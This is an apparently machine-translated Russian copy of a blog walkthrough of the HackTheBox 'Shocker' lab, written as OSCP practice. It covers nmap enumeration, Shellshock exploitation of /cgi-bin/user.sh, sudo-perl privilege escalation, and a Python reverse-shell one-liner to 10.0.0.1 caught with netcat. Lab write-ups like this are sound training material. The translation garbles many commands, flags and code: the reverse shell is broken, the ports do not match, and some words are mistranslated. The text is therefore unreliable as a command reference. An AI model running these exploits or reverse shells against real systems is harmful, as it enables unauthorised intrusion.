Всем привет,
Вещи стали немного серьезными, так как я купил свою попытку сертификации OSCP. Поэтому я надеюсь, что в течение следующих 2 недель я выпущу больше записей HTB.
Давай начнем!!
Команда:
NMAP -SC -SV -T4 -On nmap.txt -VVV 10.10.10.56
- -SC Сценарии
- -SV открытые порты для определения информации об обслуживании/версиях
- -T4 Время для более быстрого вывода (0-5)
- -На сохранить его в файл
- -VVV разные уровни и приведут к тому, что NPNING будет распечатать больше информации во время выполнения. Больше чтения связь
Порт открывается:
- 80 TCP http
- 2222 TCP SSH
Давайте запустим полное сканирование порта, чтобы увидеть, пропустили ли мы что -нибудь здесь.
Команда:
nmap -p- -на Allports.txt 10.10.10.56
Так что ничто другое на самом деле не возвращается, что является обломом.
Давайте попробуем запустить быстрое сканирование Vuln только для ударов.
Команда:
nmap – -сценарист vuln -on vuln.txt 10.10.10.56
Ничто здесь не появляется ко мне, поэтому давайте перейдем к сайту, так что давайте посмотрим на источник.
Щелкните правой кнопкой мыши
Я ударил несколько закусок с Дирб Итак, я собираюсь использовать Dirbuster Анкет
Из неровных окон выполняются следующие.
Команда:
Dirbuster Это должно занять минуту, затем открыть новый терминал.
Ключевые предметы, чтобы обратить внимание на: Целевой URL Файл со списком Dirs/Files Расширение файла
Похоже, мы нашли файл user.sh На машине, к которой мы могли бы получить доступ.
Вы можете щелкнуть правой кнопкой мыши или вручную перейти к нему на веб -странице.
Итак, после изучения /cgi-bin/ И название коробки, кажется, можно ударить Shellshock.
Команда:
NMAP -SV -P80 -Скрипт HTTP -ShellShock – -Script -Args 10.10.10.56
Как я узнал, чтобы использовать это? Nmap связь
Теперь, когда мы знаем, что у нас есть путь, давайте перейдем к Searchsploit Анкет
Команда:
SearchSploit Shellshock
Я иду с этим, потому что это инъекция RCE, которая также является сценарием Python. Другие перечисленные – это файлы TXT, которые мне немного приколили.
Используйте CP Команда для скопирования эксплойта в местоположение вашего файла или найти его в репозиции Exploit-DB и загрузите его.
Хорошо, давайте посмотрим на код эксплойта.
Команда:
nano exploit.py
Если вы прокрутите вниз, у вас есть некоторые варианты, как запустить эксплойт, не изменяя его.
Чтобы подтвердить, вы можете запустить код тестирование.
Команда:
Python exploit.py
Команда:
Python exploit.py.10.10.56 Pages =/cgi-bin/user.sh
Команда:
лауреат
Ницца!
Здесь мы посмотрим, что мы можем сделать с Sudo.
Команда:
Sudo -l
Похоже, мы можем Корень без пароля из /usr/bin/perl место нахождения.
Направляясь в Google, чтобы подтвердить мое мышление.
Также Hackingarticlics Предоставляет действительно отличный ресурс для Comands связь
Команда:
sudo perl -e ‘Exec “/bin/bash”;’ id кто я
Команда:
wc root.txt
Еще один способ сделать это для более стабильной оболочки!
После первоначального доступа на машине.
Команда:
который Python3
Отсюда отправляйтесь в Полезное нагрузка все, что GitHub связь
Команда:
python -c ‘import.socket (сокет. Af_inet, гнездо. Sock_stream); s.connect ((“10.0.0.1”, 4242)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); импорт pty; pty.spawn (“/bin/bash”) ‘
Обновите IP -адрес к вашему Адрес TUN0 Анкет
Используйте команду выше!
Перед нажатием ввода откройте Netcat в другом окне.
Команда:
NC -NVLP 1234
Теперь мы можем запустить тот же Priv ESC, что и раньше. На этот раз мы будем в более стабильном экземпляре!
Путь, чтобы пойти, ты получил это !!
Оригинал: “https://dev.to/0xhuey/writeup-hackthebox-shocker-without-metasploit-oscp-prep-1mnh”